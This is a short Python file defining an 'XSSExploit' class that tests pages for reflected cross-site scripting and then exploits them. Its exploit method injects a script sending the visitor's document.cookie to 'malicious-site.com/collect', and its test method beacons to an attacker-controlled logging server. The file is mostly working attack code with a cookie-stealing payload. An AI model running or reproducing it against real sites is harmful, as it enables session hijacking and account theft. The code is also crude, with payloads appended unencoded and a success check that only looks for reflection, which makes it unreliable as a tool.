import requests
import re
import time

class XSSExploit:
    """
    This class is designed to test and exploit XSS (Cross-Site Scripting) vulnerabilities.
    """

    def test_xss(self, url: str) -> bool:
        """
        Tests if the given URL is vulnerable to XSS by injecting a script tag that sends a GET request to a controlled endpoint.

        Args:
        url (str): The URL to test for XSS vulnerability.

        Returns:
        bool: True if the URL is vulnerable, False otherwise.
        """
        unique_id = "xss_test_" + str(time.time())
        test_payload = f"<script>new Image().src='http://yourserver.com/log?test={unique_id}';</script>"
        try:
            requests.get(url + test_payload, timeout=10)
            # Assume there is a function to check the log
            if check_log_for_id(unique_id):
                return True
            else:
                return False
        except requests.RequestException:
            return False

    def exploit(self, url: str) -> str:
        """
        Attempts to exploit the XSS vulnerability at the given URL by injecting a script that sends cookies to a controlled endpoint.

        Args:
        url (str): The URL to exploit.

        Returns:
        str: The details of the exploitation or an error message.
        """
        exploit_payload = "<script>document.location='http://malicious-site.com/collect?cookie='+document.cookie</script>"
        try:
            response = requests.get(url + exploit_payload)
            if exploit_payload in response.text:
                return "XSS exploit successful, payload injected."
            else:
                return "Failed to inject XSS payload."
        except requests.RequestException:
            return "Failed to exploit the vulnerability due to a network error."

def check_log_for_id(unique_id: str) -> bool:
    """
    Checks the server logs for the presence of a unique identifier to confirm XSS execution.

    Args:
    unique_id (str): The unique identifier to look for in the server logs.

    Returns:
    bool: True if the identifier is found, False otherwise.
    """
    # Example implementation assuming a simple file-based log
    try:
        with open('server_log.txt', 'r') as log_file:
            for line in log_file:
                if unique_id in line:
                    return True
    except FileNotFoundError:
        # Log file not found, assume no log entry
        return False
    return False
